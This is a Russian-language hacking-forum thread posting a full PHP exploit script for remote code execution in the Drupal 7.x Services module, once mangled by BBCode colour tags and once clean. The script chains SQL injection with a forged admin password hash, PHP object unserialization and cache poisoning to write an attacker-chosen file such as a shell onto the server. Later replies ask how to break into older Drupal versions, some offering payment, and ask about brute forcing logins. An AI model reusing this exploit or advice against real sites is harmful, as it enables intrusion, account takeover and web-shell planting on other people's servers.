COLOR][COLOR="#DD0000"]'source'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]],
[/
COLOR][COLOR="#DD0000"]'optional'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],
],
],
[/
COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]=> [
[/
COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'inc'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'services'[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'resources/user_resource'[/COLOR][COLOR="#007700"],
],
[/
COLOR][COLOR="#DD0000"]'endpoint'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$settings
[/COLOR][COLOR="#007700"]];
[/
COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'endpoint'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'actions'[/COLOR][COLOR="#007700"]] += [
[/
COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=> [
[/
COLOR][COLOR="#DD0000"]'enabled'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]'settings'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$settings
[/COLOR][COLOR="#007700"]]
];
}

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]storage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]keysToPersist[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_fill_keys[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]array_keys[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
}
}

class[/
COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]Extends[/COLOR][COLOR="#0000BB"]DrupalCacheArray[/COLOR][COLOR="#007700"]{
protected[/COLOR][COLOR="#0000BB"]$persistable[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$completeRegistry[/COLOR][COLOR="#007700"];
}

[/
COLOR][COLOR="#0000BB"]cache_poison[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]# Write the file
[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]= (array)[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TYPE_JSON[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]json_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));

[/
COLOR][COLOR="#FF8000"]# Stage 3: Restore endpoint's behaviour

[/COLOR][COLOR="#0000BB"]cache_reset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]);

if(!(isset([/
COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] ===[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]])))
{
[/
COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Failed to write file."[/COLOR][COLOR="#007700"]);
}

[/
COLOR][COLOR="#0000BB"]$file_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]];
[/
COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"File written:[/COLOR][COLOR="#0000BB"]$file_url[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]# HTTP Browser

[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]Browser
[/COLOR][COLOR="#007700"]{
private[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];
private[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]CONTROLLER[/COLOR][COLOR="#007700"];
private[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ACTION[/COLOR][COLOR="#007700"];

function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];
}

function[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]= [
[/
COLOR][COLOR="#DD0000"]"Accept: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TYPE_JSON[/COLOR][COLOR="#007700"],
[/
COLOR][COLOR="#DD0000"]"Content-Type:[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"])
];
[/
COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]controller[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]();
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_URL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POSTFIELDS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYPEER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_error[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"cURL:[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
}

return[/COLOR][COLOR="#0000BB"]json_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]);
}
}

[/
COLOR][COLOR="#FF8000"]# Cache

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]cache_poison[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CONTROLLER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ACTION[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]);
}

function[/
COLOR][COLOR="#0000BB"]cache_reset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/
COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]);
}

function[/
COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([[/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]]);
[/
COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TYPE_PHP[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
}

[/
COLOR][COLOR="#FF8000"]# Utils

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"])
{
print([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"]);
}

function[/
COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]);
exit([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
}

function[/
COLOR][COLOR="#0000BB"]store[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"])
{
[/
COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"].json"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]json_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]JSON_PRETTY_PRINT[/COLOR][COLOR="#007700"]));
[/
COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Stored[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]information in[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR



Всем срочно обновляться =)

Источник : Здесь

grimnir 10.03.2017 12:04

Drupal 7.x Services Module Remote Code Execution

Код:

#!/usr/bin/php

 ''dixuSOspsOUU.php'',
    ''data'' => ''''
];
$browser = new Browser($url . $endpoint_path);
# Stage 1: SQL Injection
class DatabaseCondition
{
    protected $conditions = [
        "#conjunction" => "AND"
    ];
    protected $arguments = [];
    protected $changed = false;
    protected $queryPlaceholderIdentifier = null;
    public $stringVersion = null;
    public function __construct($stringVersion=null)
    {
        $this->stringVersion = $stringVersion;
        if(!isset($stringVersion))
        {
            $this->changed = true;
            $this->stringVersion = null;
        }
    }
}
class SelectQueryExtender {
    # Contains a DatabaseCondition object instead of a SelectQueryInterface
    # so that $query->compile() exists and (string) $query is controlled by
us.
    protected $query = null;
    protected $uniqueIdentifier = QID;
    protected $connection;
    protected $placeholder = 0;
    public function __construct($sql)
    {
        $this->query = new DatabaseCondition($sql);
    }
}
$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid=''$cache_id''";
$password_hash = ''$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd'';
# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query =
    "0x3a) UNION SELECT ux.uid AS uid, " .
    "ux.name AS name, ''$password_hash'' AS pass, " .
    "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
    "ux.pass AS signature_format, ux.created AS created, " .
    "ux.access AS access, ux.login AS login, ux.status AS status, " .
    "ux.timezone AS timezone, ux.language AS language, ux.picture " .
    "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
    "WHERE ux.uid<>(0"
;
$query = new SelectQueryExtender($query);
$data = [''username'' => $query, ''password'' => ''ouvreboite''];
$data = serialize($data);
$json = $browser->post(TYPE_PHP, $data);
# If this worked, the rest will as well
if(!isset($json->user))
{
    print_r($json);
    e("Failed to login with fake password");
}
# Store session and user data
$session = [
    ''session_name'' => $json->session_name,
    ''session_id'' => $json->sessid,
    ''token'' => $json->token
];
store(''session'', $session);
$user = $json->user;
# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
$cache = unserialize($user->signature);
# Reassign fields
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);
store(''user'', $user);
if($cache === false)
{
    e("Unable to obtains endpoint''s cache value");
}
x("Cache contains " . sizeof($cache) . " entries");
# Stage 2: Change endpoint''s behaviour to write a shell
class DrupalCacheArray
{
    # Cache ID
    protected $cid = "services:endpoint_name:resources";
    # Name of the table to fetch data from.
    # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
    protected $bin = ''cache'';
    protected $keysToPersist = [];
    protected $storage = [];
    function __construct($storage, $endpoint, $controller, $action) {
        $settings = [
            ''services'' => [''resource_api_version'' => ''1.0'']
        ];
        $this->cid = "services:$endpoint:resources";
        # If no endpoint is given, just reset the original values
        if(isset($controller))
        {
            $storage[$controller][''actions''][$action] = [
                ''help'' => ''Writes data to a file'',
                # Callback function
                ''callback'' => ''file_put_contents'',
                # This one does not accept "true" as Drupal does,
                # so we just go for a tautology
                ''access callback'' => ''is_string'',
                ''access arguments'' => [''a string''],
                # Arguments given through POST
                ''args'' => [
                    0 => [
                        ''name'' => ''filename'',
                        ''type'' => ''string'',
                        ''description'' => ''Path to the file'',
                        ''source'' => [''data'' => ''filename''],
                        ''optional'' => false,
                    ],
                    1 => [
                        ''name'' => ''data'',
                        ''type'' => ''string'',
                        ''description'' => ''The data to write'',
                        ''source'' => [''data'' => ''data''],
                        ''optional'' => false,
                    ],
                ],
                ''file'' => [
                    ''type'' => ''inc'',
                    ''module'' => ''services'',
                    ''name'' => ''resources/user_resource'',
                ],
                ''endpoint'' => $settings
            ];
            $storage[$controller][''endpoint''][''actions''] += [
                $action => [
                    ''enabled'' => 1,
                    ''settings'' => $settings
                ]
            ];
        }
        $this->storage = $storage;
        $this->keysToPersist = array_fill_keys(array_keys($storage), true);
    }
}
class ThemeRegistry Extends DrupalCacheArray {
    protected $persistable;
    protected $completeRegistry;
}
cache_poison($endpoint, $cache);
# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));
# Stage 3: Restore endpoint''s behaviour
cache_reset($endpoint, $cache);
if(!(isset($json[0]) && $json[0] === strlen($file[''data''])))
{
    e("Failed to write file.");
}
$file_url = $url . ''/'' . $file[''filename''];
x("File written: $file_url");
# HTTP Browser
class Browser
{
    private $url;
    private $controller = CONTROLLER;
    private $action = ACTION;
    function __construct($url)
    {
        $this->url = $url;
    }
    function post($type, $data)
    {
        $headers = [
            "Accept: " . TYPE_JSON,
            "Content-Type: $type",
            "Content-Length: " . strlen($data)
        ];
        $url = $this->url . ''/'' . $this->controller . ''/'' . $this->action;
        $s = curl_init();
        curl_setopt($s, CURLOPT_URL, $url);
        curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($s, CURLOPT_POST, 1);
        curl_setopt($s, CURLOPT_POSTFIELDS, $data);
        curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
        $output = curl_exec($s);
        $error = curl_error($s);
        curl_close($s);
        if($error)
        {
            e("cURL: $error");
        }
        return json_decode($output);
    }
}
# Cache
function cache_poison($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
    cache_edit($tr);
}
function cache_reset($endpoint, $cache)
{
    $tr = new ThemeRegistry($cache, $endpoint, null, null);
    cache_edit($tr);
}
function cache_edit($tr)
{
    global $browser;
    $data = serialize([$tr]);
    $json = $browser->post(TYPE_PHP, $data);
}
# Utils
function x($message)
{
    print("$message\n");
}
function e($message)
{
    x($message);
    exit(1);
}
function store($name, $data)
{
    $filename = "$name.json";
    file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
    x("Stored $name information in $filename");
}


karkajoi 10.03.2017 16:32

Зачем 2 одинаковых поста?

mazaxaka 26.03.2017 01:40

вечно ругается на эту строку "28" $file = [

leokomaro 02.05.2017 14:31

может кто то с 6.22 помочь на возмездной основе?

ellococareloco 03.06.2017 02:17

[Quote = "leokomaro, de la publicación: 4079266, miembro de: 302606"] alguien puede ayudar con un 6,22 sobre una base reembolsable [/ quote]?

https://cxsecurity.com/issue/WLB-2016070020

alguien sabe otra vulnerabilidad a 6.22?

leokomaro 19.06.2017 21:44

CVE-2016-3168 вот это кто нибудь может объяснить как использовать?

ACat 09.07.2017 20:29

Пацаны,

Drupal 6.28, 2013-01-16

----------------------

- Fixed security issues (multiple vulnerabilities), see SA-CORE-2013-001.

реально ли это взломать?

salam477 09.10.2017 01:49

Подскажите, возможен в друпале xmlrpc брут?

в wp все предельно просто, делаешь xml Запрос с параметрами и все работает, а какие параметры у друпала? информация в сети очень древняя.

Если это реально, можно пример?

Zen1T21 22.04.2018 15:02

Паблик экспа Drupalgeddon2 только при открытой реги отрабатывает?

Тот_самый_Щуп 07.05.2018 03:06

Цитата:

Сообщение от Zen1T21

Паблик экспа Drupalgeddon2 только при открытой реги отрабатывает?

Паблик экспа Drupalgeddon2 ни в каком случае не отрабатывает, защита от дурака стоит.


Время: 13:38